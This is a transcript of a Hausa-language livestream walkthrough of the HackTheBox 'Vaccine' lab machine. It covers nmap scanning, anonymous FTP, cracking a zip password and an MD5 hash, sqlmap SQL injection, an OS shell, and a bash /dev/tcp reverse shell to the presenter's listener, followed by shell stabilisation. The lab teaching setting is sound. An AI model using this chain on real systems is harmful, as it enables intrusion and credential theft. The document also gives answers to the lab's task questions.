Bismillahirrahmanirrahim. Assalamu alaikum wa rahmatullahi ta'ala wa barakatuh. Kyawun yan uwa da abokanai na intanet baki daya, barkamu da warhaka, barkamu da sai kasancewa tare da ku a cikin wannan channel mai albarka ta Cyber Exploit Hausa. Na'am, so insha Allah a wannan episode wance a wannan stream din za mu ci gaba da tattaunawa game da HackTheBox, inda wannan zai kasance episode na 11. Na'am, so ba tare da bata lokaci ba, kai tsaye zan je na bude wato ainihin browser dina kafin wato ainihin mu ci gaba daga inda muka tsaya. Na'am, so a episode na baya mun tattauna game da oopsie. Okay, so a wannan episode insha Allah za mu je zuwa ga tax na gaba wanda shine vaccine. So kai kamar yadda muke gani za mu danna akai. Bayan mun danna yana tambayar mu kunce, yana cewa yana shawartar mu da mai connecting da VPN. So musamman ban yi connecting da VPN ba saboda na nuna wa wayan da maybe wannan shine farkon wato ainihin register da HackTheBox. So suna baka da wato ainihin open VPN file wanda shine yake baka daman kai connecting kai tsaye da IP address din da su baka, kunce da machine din da su baka. So na ga browser dina sannan in je inda na yi downloading wannan VPN file din nan. So yana cikin folder din nan ta HTTP na ls, ina da shi a nan startingpoint.ovpn. zan ce sudo openvpn akan wato ainihin startingpoint.ovpn, sai na danna enter. Yana tambaya na password, zan shigar da password ina kana zai fara running, ko in ce kamar yadda muke gani gashi nan bai fara ba dai tukunna. Cannot resolve host yake cewa. Maybe I should cancel it. Then you control C. Well, kaman da duka alamu yayi, amma na danna control C, which is going to cancel it anyway. So ta yana na gane yayi, ga cewa a can sama ya bani IP address. So let me cancel that again. Kana sai na sake running din shi. Yanzu kai tsaye wannan zai yi connecting kamar yadda muke gani. Na'am, so baya ga haka zan kirkira directory a inda nake keeping notes mai suna wato ainihin vaccine. Okay, zamu ce cd into vaccine na ls band da wani abu, sannan zamu kirkira notes mu mai suna readme.md. okay, so zamu bude shi ta hanyar amfani da sublime text kamar yadda kuke gani. Okay, so ya riga da ya bude mun, bari na jawo mana shi anan don mu gan shi. So kamar yadda na saba naka rubuta sunan room din a can sama, baya ga haka sai na keeping wato ainihin sunana da kuma kwanan watan da nake yi. So yau 1 ga watan wato ainihin Afrilu shekara ta 2024. na so zamu je zuwa ga tax har da s da muna da flag a ƙasa. okay, so now bayan yin duka wayannan abubuwan da kuke gani, za mu koma zuwa ga website din. So za mu reloading wannan link din, ko ce wannan website din, domin ya tabbatar mana da cewa mun yi connecting da HackTheBox ta hanyar running wancan open VPN file din kamar yadda muka gani. So idan yayi zai nuna mana cewa tabbas mun yi connecting successfully ba tare da wani matsala ba. So kai tsaye kamar yadda muke gani a sama yana cewa kaman connection settings bai gama ba dai, amma da duka alamu ya riga da yayi connecting. So za mu scrolling mu je zuwa ga wannan challenge din wanda shine vaccine, kana sai mu danna akai. So har yanzu kamar yadda muke gani bai riga da ya kammala refresh din da muka yi ba. Alright,
So gashi yana nuna mana, yana indicating cewa we are connected. Sannan a sama muna ganin starting point in green, meaning that mun riga da mun yi connecting. So abu na gaba da zamu yi shine zamu danna akan spawn machine, wanda shine yake ba mu daman mu kunna machine din da zamu yi attacking, ko in ce da zamu kokari mu samu flag din da suke so mu samu a ciki. So kai tsaye wannan da ya gama zai ba mu IP address. Abu na farko da zamu yi shine zamu copy IP address din mu scanning din shi ta hanyar amfani da tool din nmap, wanda hakan zai nuna mana maga ports din da suke a buɗe. Always duk lokacin da aka baka IP address, abu na farko da ya kamata ka yi shine za ka yi pingin IP address din ka ga shin IP din na yana running, zan iya accessing din shi, yana bayar da wasu bayanai da zan iya connecting da su. Bayan nan sai ka yi amfani da tool din network mapper, wanda yake maka mapping din duka network din don ya bayyana maka open ports din da suke a buɗe. Kowane port akwai service da yake running akai, imma SSH ko FTP ko telnet ko SMB ko HTTP, bi ma'ana web server kenan, ko kuma other ports. So now ga IP din ya riga da ya bayyana, zan danna akan shi so daya, wanda hakan zai bani dama cewa na yi copy ko kuma kai highlighting, ka yi Ctrl C, wanda shi ma still zai copy maka shi. So kana za mu koma cikin terminal, sai mu clear screen, sai mu pingin din shi domin mu ga is the site up, kuma ce is the IP up. Yana dawo mana da ICMP echo request, wanda hakan yana nufin cewa a site din yana tafiya, ko ce IP din yana tafiya, which is up. So zan danna Ctrl C don in cancel, kana sai ne clear screen. Now so baya ga haka zamu ce nmap tag sc for default script tag sv service version, zamu paste IP address din. Well, afwan, da duka alamu na kwafo shi ne gaba daya wancan request din da yake dawo mana. Okay, so bayan mi IP address sai mu ce tag vv ya mana babos, tag o ya mana outputting din shi zuwa ga nmap, zamu ce scan.txt. So zan danna enter kai tsaye a wannan, yayin da scan din yake wato ainihin wanzantuwa. Muna ganin port kwaya uku wanda suke a buɗe, port 21 FTP kenan, port 80 HTTP kenan, da kuma port 22. Hakan yana nufin cewa idan muka koma cikin browser muka yi pasting IP address din, hakan zai nuna mana wato ainihin zai nuna mana wato ainihin abin da yake running akai, bi ma'ana service din da yake running. So yana da kyau ne keeping din IP dina a sama. Za mu ce IP, na mi pasting din shi, then we can maybe look for open ports. Well, alright, so har yanzu bai gama ba, amma dai we can grab this. Did the day it doesn't make any sense, but we can paste it right beneath that. Baya ga haka za mu zan goge wannan gaba daya, sai ne Ctrl S to save. Okay, so now so ganin cewa muna da port 80 kamar yadda na ce, za mu buɗe sabon browser sai mu paste na IP din na. I think let me grab that again one last time, Ctrl C, kana sai ne paste din shi a cikin link, ko ce URL bar, wanda zai dawo mana da service din da yake running, ko mu ce a website din da yake running a wannan port din. So kai tsaye muna ganin megacorp login page, muna da username da password. So ba za mu yi wani abu ba a wannan mataki din, za mu koma cikin nmap din mu, maybe ya gama ko bai gama ba. Okay, bai gama ba. So ganin cewa akwai wato ainihin port 80 a ciki, so haka yana nufin cewa za mu iya run din tool din go buster ko irin ferox buster. Za mu ce tag u, sai mu ce http / guda biyu, sai mu paste IP din, sai mu danna enter kawai. Wannan zai mana scanning din shi using ferox buster.
So abinda Ferrous Buster yake shine yana zuwa cikin link din gaba daya completely, sai ya duba mana wani content ne, wani folder ne, wani directory da files ne za a iya samu a slash maybe IP address din slash wani abu. So kamar yadda muke gani gashi yana dawo mana da style.cxs wanda yake nufin wannan shine a CSS a script din da aka yi amfani da shi wajen yin kwalliya ga wannan website din, wanda shine megacorp kamar yadda muka gani ana. So har yanzu bai dawo da wani abu dai, amma iya CSS kawai yake dawo da shi. So which means nmap din ma yanzu yana yi, bai riga da ya gama ba, kamar yadda muke gani muna da 52%. So ba za mu jira duka wannan abubuwan su gama ba, za mu ci gaba da aiwatar da enumeration ɗinmu, da ma'ana ci gaba da wato ainihin ƙara yunkuri wajen nemo wasu bayanan da su taimake mu wajen shiga. So misali za mu iya zuwa nan mu ce admin, we should always keep trying the defaults, sai mu ce a shi ma admin, I don't know yayi admin, sai mu danna sign in, can this give us access? So bai dawo da wani abu ba error ba wani abu. So maybe we should try and visit that FTP. In ba ku manta ba mun ga port 21 a buɗe, so za mu iya cewa FTP, amma za mu iya gabatar da haka ne maybe idan nmap ya gama, saboda mu tabbatar da cewa FTP din akwai anonymous login, bai mana za mu iya shiga. So duba ga dai har yanzu nmap bai gama ba, I think let's just move forward with that. Za mu ce FTP, sai mu ce anonymous at the IP address. Let me grab that one last time. Let me paste an inch, sai mu danna enter. So yana ce mana connected to IP address kaza kaza, and yana tambayar mu password. So we don't need to enter any password. In the anonymous login is allowed, kowane password kasa daidai ne, in ma baka sa baka danna enter zai shigar da kai. So yana ce mana login successfully, bi ma'ana mun riga da mun shiga. So ga wanda maybe ba san me FTP yake nufi ba, FTP yana nufin wato ainihin file transfer protocol ne wanda yake baka daman hosting din wasu services, maybe ka bayar da wani share ko wani folder da kake so mutum ya iya accessing din bayanai ta cikin shi ta hanyar amfani da command din FTP ko kuma tool din FTP. Sannan anonymous user ne wanda yake like by default akan bashi, wanda yake nufin kowa zai iya shiga. Sannan at host din wanda shine target din da muke so mu shiga da sauransu. So mun yi connecting, sannan ga version din shi. So kamar yadda nake faɗa always, duk lokacin da kake gabatar da CTF irin wannan, maybe idan real life pen test kake gabatarwa ko kuma bug bounty hunting, yana da kyau ka dinga duba exploit game da irin wayannan versions na tools din ko services din da suke running. Idan HTTP ne, maybe Apache ko Nginx ko wani Tomcat ko wani abu makamancin haka, yana da kyau ka duba a cikin Google ka ga version din akwai exploit regarding that. Maybe in akwai za ka iya amfani da metasploit wajen exploiting din wannan version din service din da yake running, maybe zai iya dawo maka da wani abu. So wannan kenan. So baya ga haka za mu yi dir command wanda zai lissafa mana duk wani abubuwa da suke cikin FTP din nan, bai mana directory din nan. So muna da wani tool wanda ake kira da backup.zip. So za mu ce get akan backup.zip. Okay, na danna tab wanda zai mu auto complete, sai dan enter. Wannan kai tsaye abin da yake yi shine zai mana downloading din shi a cikin inda na yi running wannan FTP command din. So da ya riga da ya gama yake ce mana transfer complete. So in muka lsla fa, can it return anything? Maybe akwai wani hidden file ko folder wanda ya fara da dot, so ba wani abu specifically. So zamu ce exit. FTP ya riga da ya gama aiki. In muka ls yanzu muna da wannan backup.zip file. So zamu iya file akan backup.zip domin mu ga wani irin file ne wannan. Wannan yana ce mana zip archive ne, bi ma'ana an yi zipping, an yi compressing din shi ta hanyar amfani da zip. So domin mu unzipping din shi zamu yi amfani da tool din da ake kira da unzip, ko kuma ka yi gunzip, bi ma'ana g unzip kenan. Okay, so that is that. So zamu ce unzip akan backup.zip, zamu danna enter. So wannan abin da zai yi shine zai bi ma'ana decompressing din shi. Okay, abubuwan da aka cunkushe waje ɗaya muna so ya buɗo muna so mu ga komai da komai da yake ciki.
So da duka alamu akwai wani file mai suna index.php a cikin wannan zip file din na backup. So amma akwai password, bi ma'ana shi zip file din an riga da an saka mai password, ba za mu iya accessing din shi directly ba. So abin da zan yi anan shine tunda mun ga cewa ba mu san password ba, maybe you can try anything and hit enter, yana cewa password incorrect, so mu danna control C kawai domin ya fitar da mu. So ganin cewa an saka password, akwai wani tool da John the Ripper yake zuwa wajen cracking din shi. So za mu iya kokari mai cracking password din zip archive din nan, ko ce zip file din nan. So sunan tool din shi ake kira da zip to John. Okay, so mu ce zip to John akan sunan file din wanda shine backup.zip, sai mu redirecting din komai da komai zuwa ga wato ainihin john.text. So bai ma'ana ya mana converting din wannan file din na backup.zip, yayi converting din shi zuwa wani tool wanda zip John zai iya fahimta. Bai ma'ana za mu yi amfani da tool din John the Ripper wajen cracking din password din zip file din nan, saboda yayin da muka yi kokari mu unzipping din shi yana tambayar mu password and kuma ba mu san password din nan ba. So ganin haka muka ga cewa ya kamata mu wato ainihin converting din wannan zip file din zuwa ga wani file wanda John zai iya fahimta ko kuma ce yake fahimta. So za mu danna enter, wanda wannan kai tsaye kun ga cewa yana cewa menene it is assumed that all files in this archive have the same password. So za mu ls, yanzu muna dai da john.text. So maybe muka yi less akan john.text, kun ga file din da ya koma, bi ma'ana wani hash ne kamar yadda muke gani. So can we use John now to crack this password hash? So za mu ce John akan sunan file din nan wanda shine john.text, sai mu amfani da tag word list is equal to /user share. Za mu amfani da wani word list mai suna rocku.text. User share za mu ce word list, sai mu ce rocku.text. Okay, so wannan zai mana cracking din wannan file din da john.text muka bashi. Okay, ta hanyar amfani da password list ko ce word list mai suna rocku.txt. And in an ce word list ana nufin file ne wanda yake dauke da password da yawa, kamar shi wannan rocku din yana dauke da password wajen miliyan 14 ne da 700 da wani abubuwa. So aka ce password shine duk wani password da mutane suke iya sakawa, maybe my password, maybe number waya, maybe sunanka, maybe rana, ko my honey, ko I love you, ko password, ko my password, ko wani abu makamancin haka. So duka akwai shi a cikin wannan file din na rocku.text. So za mu danna enter, wannan zai muna cracking. So kai tsaye kun ga cewa ya mana cracking, cewa muna da 7418526 so mun samu password. So wannan shine password din da za mu yi amfani da shi wajen unzipping wannan backup.zip din. I think I'll take note of that a cikin note ina. So za mu ce a ƙarƙashin wannan muna da backup.zip file, sai mu ce let me paste in password na. Okay, Ctrl S to save, kana sai mu koma cikin wannan. So let me unzip yanzu, za mu ce unzip backup.zip din, na mu danna enter. So za mu paste wannan password din, zan sake copy Ctrl C, zan ce Ctrl V, sai in danna enter. So yanzu ya riga da ya muna wato ainihin decrypting file din nan. Okay, mun yi unzipping din shi. Ashe files kwaya biyu ne, akwai index.php da kuma style.css. So muka ls, yanzu muna da wayannan files din kwaya biyu. So amma bari na koma mu ga shin nmap din mu ya gama. Nmap din ma yanzu bai gama ba, gab yake da ya gama, amma kuma ferox buster da duka alamu ya gama, and kuma ba mu da wani file, kuma ce ba mu da wani /something da ya samu muna. So babu wani amfanin running din shi kenan. So now duba ga cewa wannan ya gama, abu na gaba da zamu shine zamu cutting wayannan files din. Maybe akwai wasu bayanai a cikin su, kamar shi css din misali zamu iya cewa less akan style.css, less, what am I doing?
so zan ce less akan style da css. So wannan shine file abubuwan da ya kunshi a cikin css file din. Maybe we can get something inside, password or username or wani abu makamanci haka, saboda haka kawai ba su yi zipping din shi ba in sun san cewa ba wani abu a ciki. So da duka alamu ba wani abu unique, so za mu yi q domin mu fita a cikin less. So sai mu ce less akan index.php. Maybe we can get something unique. Kamar yadda muke gani wannan php script ne wanda yake da wani function mai suna session start, sannan aka yi declaring wani condition, aka ce if is set post username and is set post password. A ƙarƙashin wannan condition aka ƙara zayyana wani condition, aka ce if username is equals to admin and an md5 post ɗin password, bi mana wani hash ne wanda yake ɗauke da password, bi mana password ɗin md5 hash ne wanda shine wannan kamar yadda muke gani. So we can take note of this, maybe zai iya zuwa handy. Za mu yi copy ɗin shi sai mu saka shi a cikin notes ɗinmu. So bayan nan mun samu index.php, ba haka za mu yi ba, za mu ce username to be admin and password to be wannan hash ɗin. Okay, then you control S to save. So bayan nan idan wayannan duka daidai ne, bi ma'ana admin is the username and password din shine wannan hash din, so ya ce login is true, bi ma'ana ya shigar da mu login page, sannan ya yi redirecting din mu zuwa ga location din wanda shine dashboard.php a cikin wannan mega cup login din. So does that mean mun samu credentials din da zamu iya shiga wannan mega din? So zamu ce admin, wajen password din nan bari mu saka hash din nan, maybe zai karbe shi, sai mu ce sign in, maybe ya shigar da mu dashboard din nan. So da duka alamu ba daidai bane. Does that mean we have to crack the hash? So amma dai bari mu ga. So da duka alamu wannan ne kawai abu mai muhimmanci a ciki. Okay, so we can queue now, quit out of that. So bari na echo dan hash din nan, za mu ce echo sai in paste hash din, sai ne redirecting din shi zuwa ga hash kawai. So in ls yanzu ina da hash din nan, in na katin akan hash za ku ga cewa ina da wannan hash din. So can I use hash id akan hash? Well, na danna da yawa, afwan. Forgive me for that. Hash, okay, za mu danna enter. So hash id tool ne wanda yake baka bayani game da wani hash, ya faɗa maka cewa md5 ne ko md2 ko md4 ko lm ko wato ainihin duk dai ga sunan kuna gani ntlm hash ne da sauransu. So yana faɗa mana cewa wannan file ɗin fa, wannan hash ɗin fa zai iya yiwa md2 ne ko md5, duka yayi kama da su. Okay, so like can we try and crack this hash? So za mu ce hashcat tool ne wanda yake baka dama kai cracking ɗin hash, kowane irin hash ne. Za mu yi amfani da a wanda shine attack mode, za mu ce 0 ya muna amfani da like md5 kenan. Za mu ce tag m, mode din shi ma za mu ce 0, sai mu amfani da tag w. Word list din da za mu amfani da shi shine user share word list, sai mu ce rocq.text still. Okay, so za mu danna enter. It is specify parameter cannot be used, rocq.text as the value must be a number. Okay, na yi kuskure. I think we don't need to specify word list, sai mu danna enter kawai, bayan mun ce tag w din nan ba. So hashcat gashi nan yana farawa. So wannan tool din yana da karfi sosai wajen cracking hash da sauran passwords din. So ga yana kun ga yana cewa token length yy. So da duka alamu ban yi abin daidai ba, zan yi control c din shi na fg fa baya running. So da duka alamu na yi kuskure ne wajen rubuta su, amma let me take a look at my notes. Maybe I can get something out of there. Well, looking at my notes,
so na dan yi kuskure ne, kuskuren da na yi ba wani abu bane, mu ce hashtag again sai mu ce tag wato ainihin hashtag tag a sai mu ce 0 tag m shi ma 0 sai mu ce hashes ko hash suna wannan hash din sai mu ce slash user share word list ba rafa ba word list sai mu ce roq.text control L to clear screen sai mu danna enter. So yanzu ya fara, yanzu ne muka yi shi daidai. So I think we can copy this command because it might come in handy. Sai mu saka shi a cikin note mu. Wannan is not that necessary tunda mu ne muka amfani da shi, and we can close the note a baya. So ga yana hash yana kokarin ya mana cracking, yana ce mana initialize back end runtime for device kaza, please be patient. So yana cewa mu yi hakuri mu dan jira. So hashcat kenan, tool din yana da karfi sosai wajen ganin yayi a cracking maka hash daban-daban. So wannan tool na hashcat yana da matukar slow idan kana amfani da processor CPU. So in this case computer tana da processor CPU ne, shi saka yake daukar lokaci. Idan kana amfani da GPU ne, Nvidia da sauran wato ainihin GPUs din, zai yi sauri ya maka cracking da sauri ba tare da ka bata lokaci ba. So ga yana is taking time, a lot of time. And kuma akwai wato ainihin switch inda ake specify wanda zai dinga nuna maka yayin da yake testing other wato ainihin potential passwords da abin da shi hash ya kunsa, yana nuna maka real life. So this is taking much time. So kamar yadda dai suka ce we have to be patient. Let me see, do we have any comments? Kada ku manta ku iya barin mana dukkan wani tambayoyinku ko kuma wato ainihin wani abu da kuke so ku yi a cikin comment section din wannan bidiyon ko in ce wannan stream din. So ya ce we have to be patient, we are exercising much more patience. So amma nmap din ya gama. So can we go through the nmap results a gurguje, wanda like yanzu ne da sai yanzu zamu tsaya mana wani binciken mai nmap ya dawo da shi da sauransu. So amma kun ga yana da kyau kana ci gaba da gabatar da duk wani abu da kasan zai iya kasancewa yayin da kake gabatar da aikinka ko kake yin wayannan abubuwan. So mun ga port 21 FTP har mun samu abubuwa a cikin FTP din, and maybe zai iya tabbatar mana cewa anonymous login is allowed. Okay, gashi ne yana cewa anonymous FTP login is allowed, wanda shine muka yi amfani da shi muka samu wancan zip file din in ba ku manta ba. And version din VSTPD ne kamar yadda muke gani 3.0.3 and kuma nothing much more unique. And we have other port wanda shine port 22 SSH kenan, which is running version 8.0 P1, and operating system name is Ubuntu as usual. Shi ma yana da matukar muhimmanci mu sani. Then going through the next port wanda shine port 80 HTTP ne, and yana running Apache HTTPD 2.4.41, and still shi ma yana ce mana is Ubuntu. And da duka alamu mana da PHP session ID which is null, bai bamu shi ba maybe. So sometimes abinda PHP session ID din ne yake just kaman cookie ne, shi ma yakan dawo maka da wani value. Zaka iya amfani da shi ka shiga account din wani ko ka yi wani siddabaru ko wani manipulating da sauransu. So and
yana supporting duka wannan method din, get method, head method da kuma post and option method. So akwai other ports in da suke filtered, they are not opened, but ya nun dawo mana da su duk da dai they have no response as we can see da sauransu. So that is that regarding the nmap scan. So let's check on our hash card kamar ya gama nema, and voila, hash card ya mana cracking password din. So bayan mun yi hakuri yake cewa akwai password 14,344,385 password wanda suke cikin wannan raw queue da text din kamar yadda na faɗa muku a baya ɗazu, amma sai dai kamar na ce da 700 ne, so afwan 300 ne, 300. And hash din nan yana ɗauke da password QWERTY789. so wannan shine plain password din mu. Bari mu kwafo shi gaba ɗaya sai mu saka shi a cikin note din mu, is very very important. So like wannan shine abin da ya kunsa, ya kamata mu kwafo shi ne, kun ce control X sai mu saka shi anan kawai, control V. Wannan we don't need it, and we can do control S to save. So it means we have the admin and the password. Can we log in successfully? So tool din ya gama, and shi baya ajiye notes balantana magani. So za mu koma cikin browser din nan, kana mu gwada login. Mu ce admin, and wajen password din kada ku manta password din nan da muka dauko QWERTY, zamu yi control C akan shi, then we can try to log in. Zan ce control V sai mu danna sign in. Don't save, and maybe this will allow us to enter. Voila, ya shigar da mu dashboard kamar yadda wancan index.php din ya nuna mana. So a cikin dashboard din ba wani abu unique, ba za mu iya clicking akan kowane abu ba, da duka alamu record ne ya dawo mana da shi. So muna da ijo da search, like can we search for anything? Maybe let's say password, mu danna search, nothing. But amma idan muka sa ido da kyau URL ɗinmu ya canza. Let me take note of that, shi ma is very important. Like muna da search query password. Okay, can we do something apart from that? Well, maybe me amfani da SQL map. Maybe we should try manual testing. Irin SQL injection shine mi amfani da hash, sai mu ce o1, bari mu bada space o1 equal to 1, sai mu commenting komai da komai. Okay, let me copy this, ko kuma bari mu copy iya nan din tunda we have the URL still up, sai mu goge password din nan. Let me paste in control V, sai mu danna enter. Will that return something? Nothing. Well, can we check the cookies? Like PHP session ID nan da muka gani a port 80. So can I right click, sai in ce inspect, za mu je karkashin storage kamar yadda muka yi a wancan challenge din. A karkashin cookies muna da PHP session ID, and we have a value of cookies, bi ma'ana muna da cookie ana. Haka zalika in baka da wannan method din akwai wani extension da ake kira wato ainihin cookie editor, gashi ana. So in na danna akan shi zaka iya adin din shi in kai browser din cookie editor, ka sa sunan browser ɗinka Firefox ne ko kuma Chrome. So in ka danna like zaga extension din sai kai adin din shi ko kai download din shi, zai baka dama ka dinga ganin wayannan. So ga PHP session ID muna gani, muna da wannan cookie din. So wannan cookie din is a potential wanda zai iya dawo mana da wani bayani. Maybe you can use SQL map to search for this query, any query, it can be anything, sai mi supply din shi. So like a gurguje bari na yi hakan a aikace ta hanyar amfani da SQL map. So mu ce SQL map, sai amfani da tag u, sai in ce http URL din kenan, sai in dauko wannan abun. I think let me just clear it gaba daya, then you paste in gaba daya. So it can be this thing, it can be anything.
so query din zai iya kasancewa kowane irin abu ne, maybe kamar yadda bayan mun rubuta password din nan, it can be anything ko please subscribe or anything. So baya ga haka I think yana da kyau mu saka shi a cikin wato ainihin parenthesis, sorry quotation ba parenthesis ba, sai mu amfani da cookie tab, sai mu ce cookie is equals to, sai mu amfani da php ses id, session id kenan, sai mu ce is equal to, bari mu je mu copy shi again, php session id, sai mu copy wannan, I guess can paste this, close that, and that is all. So like ya kamata in yi full screen a wannan mataki din, control L to clear screen domin ya daidaita mana shi komai da komai. Okay, I hope you guys are enjoying the stream. Well, zan danna enter kawai. So ga wanda ba san me SQL map yake yi ba, SQL map tool ne wanda yake testing din SQL injection, irin su wato ainihin blind SQL injection, irin su wato ainihin stored, do we have anything stored SQL injection da sauransu. So we don't need to do things. Yana tambaya mu, it looks like the back end is PostgreSQL, bi ma'ana back end din da aka amfani da shi wajen hada shi wancan website din, like sunanta PostgreSQL, akwai MySQL, akwai PostgreSQL, SQLite 3 da sauran SQL irin su Oracle da sauransu. So yana tambayar mu yes or no, we just click enter, ya mana default. For remaining tests, do you want to include all tests PostgreSQL, amu ce enter kawai, ya mana default bi ma'ana yes kenan. So yana mana testing din payloads daban-daban, irin su Boolean based SQL, where having clause, duka dai ga yana yi. Akwai time based SQL injection, and is using the get parameter akan search din nan, shi wancan search query din da muka samu wannan kenan, imana cikin browser din. So yanzu abin da muke kokarin mu yi manually shine a wannan input field din nan wajen yana saka mana payloads daban-daban, abin da shi SQL map yake yi kenan, har ya gano mana vulnerability, maybe there is something is vulnerable. So let me check, kamar yana dawo da wani abu, yana cewa get parameter search is vulnerable. Okay, it means like, do you want to keep testing with others if any, zamu ce kawai enter, ya mana default. And bayan mun danna enter ya dawo mana da wani muhimmin abu, sannan da ƙarshe ya gama. So abin da ya dawo mana da shi mai muhimmanci a nan shine yana ce mana SQL map identify the following injection points, bi ma'ana wuraren da zamu iya injecting din payload a ciki, shine like boolean base blind kenan. A wajen search parameter din nan zamu iya testing din wannan wajen da yace and password, sai mu testing din wannan gaba daya. So let me copy this, then we can go back to the search query, sai ne paste din shi anan, then I can hit on search, maybe wannan ya break it din abin ya dawo mana da wani abu, nothing, ba error ba wani abu. So wannan bai yi ba, I don't know. We have arrow base shima, we can copy that, I guess ko ban kofa daidai ne. Well, bari na goge wannan gaba daya, maybe na ɗazan ma da bai yi ba, ban saka password ɗin ba ne, password parameter. So zamu ce password misali, sai na pasting. I think I grab the correct thing, let me copy that again. Na farkon ma ya kamata mu sake testing, bari mu copy na farkon, dan ya kamata ya breaking tunda SQL map ya gano cewa zamu iya breaking. So zamu yi pasting kawai, control V, sai mu danna enter, and nothing happened, but it looks like bai dawo mana da result din ba. Well, let's try the second payload. Daga search din nan kenan.
zan yi pasting control V sai na danna enter. Maybe this might also break. Nothing happened. Oh sorry, kun gani yana da mana da error, like wannan shine vulnerability din, ban sa ido da kyau ba. Can you see that? Awesome. Well, got another injection point shine using this short one, and wannan is stack queries. Wannan zai yi bacci na okay afwan. So na manta ban ya kamata muku bayanin me wayannan queries din suke nufi. So but wannan might take a while like for you to understand this at this point. Amma akwai bidiyon da ne game da wato ainihin SQLite 3 using Python. Na yi bidiyon na wajen shekara 2 kenan, za ku iya zuwa ku duba wancan don ku fahimci wannan statement din me suke, irin su select, then maybe update da sauransu, delete da sauransu. Okay, where select all from a database ko kuma from a table, where so certain is that, and many more. So let's try the last abu a wajen sai ne pasting. Wannan zai yi baccin minti 5 na sakon 5 kafin ya dawo mana da wani abu misali. So kun gani yana jira maybe 1 2 3 4 maybe 5 kafin ya executing. So wannan just will sleep for 5 seconds kafin ya dawo mana da abu. So that is that. And like looking at this, can we include tag os is equals to shell? Like, is that what I have in my notes? Not da na abin da ya kamata mi kenan. So os shell ba equals to shell bane, like hyphen shell ne. Ba ne control L da in clear screen. So zamu ce hyphen shell sai mu danna enter. And so wannan da ƙarshe in ya gama duk wani abu da zai yi kawai ya shigar da mu cikin shell din, bi ma'ana cikin database din kenan. And voila, as you can see yana ce mana calling Linux OS shell, like yanzu muna kai but it's not stable. Muka ls, do you want to retrieve command standard input, mu ce like enter kawai, retrieving base global y. What have I done? Like let me do Ctrl C, and Ctrl C ya fitar mana da shi. So like can I use bash tag C? Let me executing bash direct, mu ce bash tag I interact mode kenan, sai mu amfani da greater than, sai mu ce ampersand I think, sai mu ce slash dev TCP, then our IP address wanda shine 10.10.15.97, and na gano haka ne in na ce IPA wajen ton 0 in nan bayan na yi running wancan open VPN file din, wannan shine IP address din. And abin da yasa na gano haka a can sama in kun sa ido gashi yana nuna mu anan. So let me clear that, and abin da nake kokari shine zan amfani da netcard LNVP, sai mu ce quad 9. So ya mana listening akan wannan port din locally. So mu ce 97, bayan mun sa 97 sai mu sa / sai mu ce port din wanda shine 999, and sai mu ce 0 greater than wato ainihin ampersand 1, sai mu closing parenthesis din can ko ce quotation din nan. Okay, and with this bari na yi saboda ku ga connection din has retrieved ana. So like if I hit enter yana tambaye mu do you want to why mu ce enter kawai, and voila, netcard ya karbo mana wannan connection din. So wannan zamu iya cancel din shi in mun ga dama, amma let's focus on the wannan. So yanzu mun yi login zuwa ga machine din, mun yi hacking dinta like user postgres at vaccine, sannan muna cikin wannan path din as you can see. Okay, so baya ga haka I think we can still stabilize the shell using Python. Zamu ce Python 3 tag C, sai mu amfani da single quote, zamu ce import pty, sai mu semicolon, sai mu ce pty.spawn, and what are we spawning? Zamu ce quote / bin bash, bin / bash,
haka, sai mu closing quotation, sai mu closing wato ainihin bracket, then close that opening quote. I think wannan zai mana stabilizing shell din. So zan danna enter, yana cewa python waye. So a jikin nan sun ce control z, na fita a cikin netcat, amma yana running a foreground, bai ma'ana a cikin a baya, a background yana running. So zan rubuta stty, so ban taɓa yin wannan like live ba a cikin stream, za mu ce minus echo, and zan danna enter, sai in ce fg ya mana foregrounding dan wancan abin da yake run a background wanda shine netcat kenan. Like fg bai bane, fg hello kamar ya makale, and let me just write fg haka, sai in danna enter, ya dawo mana shi a foreground. Sai mu ce export term is equal to, ya mu ce x term. So har yanzu dai muna kokarin mi wato ainihin stabilizing shell din, muka danna enter, and yanzu za ga cewa wannan is a stable shell. In muka yi clear zai yi clear, kun gani. So inda a baya ne muka yi clear zai ce muna wani abubuwa, so mu ce lsla dan mu ga abubuwan da suke cikin nan. So like var postgresql, ba muna cikin 11 main. So like let's go back to that main user wanda shine postgresql, muka ls anan lsla muna da user.text. okay, so mun samu flag na farko kenan, cat user.text, ga wata fulla can na gani .ssh, so mun samu user flag din mu kenan. So amma kada ku manta akwai abubuwan da yawa ba mu yi ba, kamar irin su amsa tambayoyin da suke baya. So na yi skipping abubuwa da yawa a ciki, forgive me for that, and na dan abin ya tafi da ni ne gaba. Ya mu ce user, wannan shine user flag, za mu yi control s to save, kana sai mu koma cikin browser din nan, mu koma cikin tags din nan. So bayan mun ɗauko IP address kawai mun je muna ta yin abubuwa ne daban-daban. So let's answer some questions. So kada ku manta target din ma'anar shi ne mu samo root flag. So tambayan farko suna tambayan mu cewa beside SSH and HTTP, what other services is hosted on this box? So mun san cewa FTP ne, saboda port uku ne a buɗe, akwai FTP, akwai SSH, akwai HTTP. So mu ce FTP a matsayin an san mu, sai mu submitin din shi, which is going to be correct. As you can see, that's some success. So let me grab tax na biyu, and ya ce mana question din is correct, kun ce amsar question is correct. Tax 2 shine suka ce this service can be configured to allow login with any password for specific username. What is that username? Wanda shine anonymous, I guess, wanda da shine muka shiga har muka samu backup file din idan ba ku manta ba. So za mu paste din shi, sai mu submit, which is also correct. And tax na uku suka ce what is the name of the file? What is the name of the file downloaded over this service? Shine backup.zip file din nan da muka samu idan ba ku manta ba. So duka mu yi covering wannan, shi yasa like ba mu sha wahala wajen amsa tambayoyin nan ba, because duka amfanin keeping note kenan. Amma ka manta duk zaka zo ka wannan, in ba haka ba sai ka sake ka koma daga farko yayin da kake enumerating kana amsa tambayoyin, ko kuma based of the question sai kai abin da suka ce ka yi sabida question din nan. So tax na gaba wanda shine tax na hudu, and tax din shine suka ce what script comes with the John the Ripper tool set and generate a hash from a, kama wannan zip to John ne, like in ban manta ba, zip to John shine script din da John yake zuwa da shi domin ya maka converting din zip archive zuwa ga abin da John zai iya fahimta domin ya cracking din shi. So answer is zip to John. So shi ma mun yi amfani da shi, zip to John. And tax na biyar, and through S to save, tax din shine
